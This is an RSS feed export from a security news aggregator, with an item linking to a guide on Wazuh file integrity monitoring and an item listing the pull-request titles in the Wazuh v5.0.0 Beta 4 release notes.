<?xml version="1.0" encoding="UTF-8" ?>
<?xml-stylesheet type="text/xsl" href="/rss-style.xsl"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:media="http://search.yahoo.com/mrss/" xmlns:dc="http://purl.org/dc/elements/1.1/">
<channel>
<title><![CDATA[Team IT Security - 📰 Alle Kategorien]]></title>
<link><![CDATA[https://tsecurity.de/export/rss/alle-kategorien.xml?q=wazuh+v4142%2F]]></link>
<description><![CDATA[Das Gesamte Cyber Threat Intelligence Feed-Archiv von TSecurity.de. Alle Nachrichten, Sicherheitsmeldungen, Videos, Downloads und Analysen in einer zentralen Übersicht.]]></description>
<language>de-DE</language>
<lastBuildDate>Tue, 28 Jul 2026 23:39:08 +0200</lastBuildDate>
<pubDate>Tue, 28 Jul 2026 23:39:08 +0200</pubDate>
<ttl>15</ttl>
<copyright>2026 Team IT Security</copyright>
<managingEditor>lakandor@tsecurity.de (Horus Sirius)</managingEditor>
<webMaster>lakandor@tsecurity.de (Horus Sirius)</webMaster>
<category>IT Security</category>
<category>Cybersecurity</category>
<category>Nachrichten</category>
<generator>Team IT Security RSS Generator v2.0</generator>
<image>
<url>https://tsecurity.de/favicon.ico</url>
<title><![CDATA[Team IT Security - 📰 Alle Kategorien]]></title>
<link><![CDATA[https://tsecurity.de/export/rss/alle-kategorien.xml?q=wazuh+v4142%2F]]></link>
</image>
<atom:link href="https://tsecurity.de/export/rss/it-security.xml?q=wazuh+v4142%2F" rel="self" type="application/rss+xml" />
<item>
<title><![CDATA[How to deploy File Integrity Monitoring with Wazuh SIEM!]]></title>
<description><![CDATA[File integrity monitoring (FIM), sometimes referred to as file integrity management, is a security process that monitors and analyzes the…Continue reading on InfoSec Write-ups »]]></description>
<link>https://tsecurity.de/de/3687416/hacking/how-to-deploy-file-integrity-monitoring-with-wazuh-siem/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3687416/hacking/how-to-deploy-file-integrity-monitoring-with-wazuh-siem/</guid>
<pubDate>Wed, 22 Jul 2026 21:15:16 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div class="medium-feed-item"><p class="medium-feed-image"><a href="https://infosecwriteups.com/how-to-deploy-file-integrity-monitoring-withwazuh-siem-106eb463eb10"><img src="https://cdn-images-1.medium.com/max/1512/0*KnSwGh0ZDCAa2GHb.png" width="1512"></a></p><p class="medium-feed-snippet">File integrity monitoring (FIM), sometimes referred to as file integrity management, is a security process that monitors and analyzes the…</p><p class="medium-feed-link"><a href="https://infosecwriteups.com/how-to-deploy-file-integrity-monitoring-withwazuh-siem-106eb463eb10">Continue reading on InfoSec Write-ups »</a></p></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Wazuh v5.0.0 Beta 4]]></title>
<description><![CDATA[What's Changed

fix: persist engine startup state for CMSync route logging by @jam300 in #37356
Fix invalid MTU value reported for Windows network interfaces by @vikman90 in #37394
Restore modern.bpf.o checkfiles baseline reverted by 4.14.7 merge by @lchico in #37414
Suppress version-coordination...]]></description>
<link>https://tsecurity.de/de/3683727/it-security-tools/wazuh-v500-beta-4/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3683727/it-security-tools/wazuh-v500-beta-4/</guid>
<pubDate>Tue, 21 Jul 2026 14:50:03 +0200</pubDate>
<category>💾 IT Security Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>What's Changed</h2>
<ul>
<li>fix: persist engine startup state for CMSync route logging by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jam300/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jam300">@jam300</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4791733554" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37356" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37356/hovercard" href="https://github.com/wazuh/wazuh/pull/37356">#37356</a></li>
<li>Fix invalid MTU value reported for Windows network interfaces by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vikman90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vikman90">@vikman90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4803040708" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37394" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37394/hovercard" href="https://github.com/wazuh/wazuh/pull/37394">#37394</a></li>
<li>Restore modern.bpf.o checkfiles baseline reverted by 4.14.7 merge by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/lchico/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/lchico">@lchico</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4807506800" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37414" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37414/hovercard" href="https://github.com/wazuh/wazuh/pull/37414">#37414</a></li>
<li>Suppress version-coordination WARNINGs on stop/unavailable module by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/lchico/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/lchico">@lchico</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4794436123" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37372" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37372/hovercard" href="https://github.com/wazuh/wazuh/pull/37372">#37372</a></li>
<li>Clarify security policy for pre-release versions and disclosure timeline by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vikman90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vikman90">@vikman90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4818245095" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37423" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37423/hovercard" href="https://github.com/wazuh/wazuh/pull/37423">#37423</a></li>
<li>Bump 5.0.0 branch by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/wazuhci/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/wazuhci">@wazuhci</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4820838366" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37429" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37429/hovercard" href="https://github.com/wazuh/wazuh/pull/37429">#37429</a></li>
<li>wazuh-manager: Memory and copy-reduction improvements part 1 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/matigarciadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/matigarciadev">@matigarciadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4677386441" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36979" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36979/hovercard" href="https://github.com/wazuh/wazuh/pull/36979">#36979</a></li>
<li>Improve default cores detection by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/LucioDonda/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/LucioDonda">@LucioDonda</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4770907500" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37288" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37288/hovercard" href="https://github.com/wazuh/wazuh/pull/37288">#37288</a></li>
<li>Standardize and verify Wazuh configuration documentation  by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TomasTurina/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TomasTurina">@TomasTurina</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4806420763" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37411" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37411/hovercard" href="https://github.com/wazuh/wazuh/pull/37411">#37411</a></li>
<li>Handle rootcheck removed tags by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rovogel/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rovogel">@rovogel</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4788149250" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37346" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37346/hovercard" href="https://github.com/wazuh/wazuh/pull/37346">#37346</a></li>
<li>Update docs (agent) for the new password in manager by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Miguevrgo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Miguevrgo">@Miguevrgo</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4816394475" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37420" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37420/hovercard" href="https://github.com/wazuh/wazuh/pull/37420">#37420</a></li>
<li>Backport the workflow for generating pre-release agent issues to version 5.0.0 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/MarcelKemp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/MarcelKemp">@MarcelKemp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4827403310" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37490" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37490/hovercard" href="https://github.com/wazuh/wazuh/pull/37490">#37490</a></li>
<li>Upgrade 5.0.0 python dependencies by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jepalfer/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jepalfer">@jepalfer</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4793328371" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37361" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37361/hovercard" href="https://github.com/wazuh/wazuh/pull/37361">#37361</a></li>
<li>Change indexer user name and password by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TomasTurina/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TomasTurina">@TomasTurina</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4831885135" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37502" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37502/hovercard" href="https://github.com/wazuh/wazuh/pull/37502">#37502</a></li>
<li>Remove startup deprecation warning from cluster_control and agent_upgrade by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vikman90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vikman90">@vikman90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4835362636" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37509" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37509/hovercard" href="https://github.com/wazuh/wazuh/pull/37509">#37509</a></li>
<li>Change indexer username and password to wazuh-manager by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TomasTurina/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TomasTurina">@TomasTurina</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4839278273" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37520" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37520/hovercard" href="https://github.com/wazuh/wazuh/pull/37520">#37520</a></li>
<li>Fix to improve fim_sync db performance. by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hernanvalenzuela/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hernanvalenzuela">@hernanvalenzuela</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4744034552" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37180" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37180/hovercard" href="https://github.com/wazuh/wazuh/pull/37180">#37180</a></li>
<li>SCA/FIM sync lifecycle: close DBs on graceful shutdown, defer coordination during first sync, and increment SCA check version on change by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jr0me/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jr0me">@jr0me</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4790097835" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37353" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37353/hovercard" href="https://github.com/wazuh/wazuh/pull/37353">#37353</a></li>
<li>Fix version comparison in indexer documents updates by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TomasTurina/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TomasTurina">@TomasTurina</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4830108432" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37498" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37498/hovercard" href="https://github.com/wazuh/wazuh/pull/37498">#37498</a></li>
<li>Propagate sync errors to each module by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jpcerrone/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jpcerrone">@jpcerrone</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4752961563" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37212" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37212/hovercard" href="https://github.com/wazuh/wazuh/pull/37212">#37212</a></li>
<li>Cache indexer credentials in clusterd by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TomasTurina/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TomasTurina">@TomasTurina</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4832215168" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37504" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37504/hovercard" href="https://github.com/wazuh/wazuh/pull/37504">#37504</a></li>
<li>Standardize CHANGELOG format and keep prior versions in the bumper by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4835667651" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37513" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37513/hovercard" href="https://github.com/wazuh/wazuh/pull/37513">#37513</a></li>
<li>Warn on duplicate agent connection only when it persists by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4827846696" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37493" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37493/hovercard" href="https://github.com/wazuh/wazuh/pull/37493">#37493</a></li>
<li>Backport: Lower DBSync-not-available shutdown messages to DEBUG to 5.0.0 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/anromerom/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/anromerom">@anromerom</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4856788396" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37567" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37567/hovercard" href="https://github.com/wazuh/wazuh/pull/37567">#37567</a></li>
<li>Add retry logic to indexer templates download by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TomasTurina/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TomasTurina">@TomasTurina</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4874928399" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37643" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37643/hovercard" href="https://github.com/wazuh/wazuh/pull/37643">#37643</a></li>
<li>Reduce authd enrollment log severity for expected rejections by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4846590749" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37540" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37540/hovercard" href="https://github.com/wazuh/wazuh/pull/37540">#37540</a></li>
<li>Reduce memory usage when downloading VDP feed by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Antoniogm03/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Antoniogm03">@Antoniogm03</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4795745800" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37375" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37375/hovercard" href="https://github.com/wazuh/wazuh/pull/37375">#37375</a></li>
<li>Fix server-side version bump for disconnected agent metadata updates by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TomasTurina/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TomasTurina">@TomasTurina</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4877451955" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37647" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37647/hovercard" href="https://github.com/wazuh/wazuh/pull/37647">#37647</a></li>
<li>Re-enable AWS Inspector integration tests in 5.0.0 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/MAnDumu/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/MAnDumu">@MAnDumu</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4876030241" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37645" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37645/hovercard" href="https://github.com/wazuh/wazuh/pull/37645">#37645</a></li>
<li>Fix sca internal limits by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rovogel/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rovogel">@rovogel</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4824570694" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37438" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37438/hovercard" href="https://github.com/wazuh/wazuh/pull/37438">#37438</a></li>
<li>Silence untrustworthy FIM schema-validation errors during shutdown by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Nicogp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Nicogp">@Nicogp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4886428969" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37688" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37688/hovercard" href="https://github.com/wazuh/wazuh/pull/37688">#37688</a></li>
<li>Fix spurious ERROR/WARNING logs during agent shutdown by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Nicogp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Nicogp">@Nicogp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4883034413" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37673" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37673/hovercard" href="https://github.com/wazuh/wazuh/pull/37673">#37673</a></li>
<li>Fix daemon stats for analysisd by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/NahuFigueroa97/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/NahuFigueroa97">@NahuFigueroa97</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4840468288" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37525" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37525/hovercard" href="https://github.com/wazuh/wazuh/pull/37525">#37525</a></li>
<li>Resolve logging macro collisions and improve LogFn design (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4790797410" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37354" data-hovercard-type="issue" data-hovercard-url="/wazuh/wazuh/issues/37354/hovercard" href="https://github.com/wazuh/wazuh/issues/37354">#37354</a>) by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4802669894" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37393" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37393/hovercard" href="https://github.com/wazuh/wazuh/pull/37393">#37393</a></li>
<li>Enable authd in manager source-install integration test step by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4890660615" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37693" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37693/hovercard" href="https://github.com/wazuh/wazuh/pull/37693">#37693</a></li>
<li>Stop <code>verify-agent-conf</code> from falsely warning on agent-only wodle blocks, without breaking their validation by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vikman90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vikman90">@vikman90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4884638391" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37680" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37680/hovercard" href="https://github.com/wazuh/wazuh/pull/37680">#37680</a></li>
<li>Fixing CIS 6.1.9 rule impossible permission check for /etc/group- by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hossam1522/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hossam1522">@hossam1522</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4252101380" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/35405" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35405/hovercard" href="https://github.com/wazuh/wazuh/pull/35405">#35405</a></li>
<li>Lower connection socket error log to debug level in wazuh-agentd by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/MAnDumu/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/MAnDumu">@MAnDumu</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4885894234" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37685" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37685/hovercard" href="https://github.com/wazuh/wazuh/pull/37685">#37685</a></li>
<li>Memory improvements part 2 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/NahuFigueroa97/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/NahuFigueroa97">@NahuFigueroa97</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4822579091" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37433" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37433/hovercard" href="https://github.com/wazuh/wazuh/pull/37433">#37433</a></li>
<li>Fix make clean-deps failing when src/external is missing by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vikman90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vikman90">@vikman90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4901090899" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37724" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37724/hovercard" href="https://github.com/wazuh/wazuh/pull/37724">#37724</a></li>
<li>fix date schema validation error in scheduled metrics by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/LucioDonda/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/LucioDonda">@LucioDonda</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4892142502" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37703" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37703/hovercard" href="https://github.com/wazuh/wazuh/pull/37703">#37703</a></li>
<li>Report failure when block-ip fails to block an IP by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/lchico/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/lchico">@lchico</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4824776124" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37439" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37439/hovercard" href="https://github.com/wazuh/wazuh/pull/37439">#37439</a></li>
<li>Fix rename race on logcollector file status during shutdown by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Miguevrgo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Miguevrgo">@Miguevrgo</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4891170282" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37695" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37695/hovercard" href="https://github.com/wazuh/wazuh/pull/37695">#37695</a></li>
<li>Calibrate log levels in router and vulnerability_scanner by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4902123164" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37731" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37731/hovercard" href="https://github.com/wazuh/wazuh/pull/37731">#37731</a></li>
<li>Adds AR Windows binary extension fallback by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rjcausarano/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rjcausarano">@rjcausarano</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4828497169" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37496" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37496/hovercard" href="https://github.com/wazuh/wazuh/pull/37496">#37496</a></li>
<li>Lower httpsrv C++ standard from 20 to 17 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4912257627" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37751" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37751/hovercard" href="https://github.com/wazuh/wazuh/pull/37751">#37751</a></li>
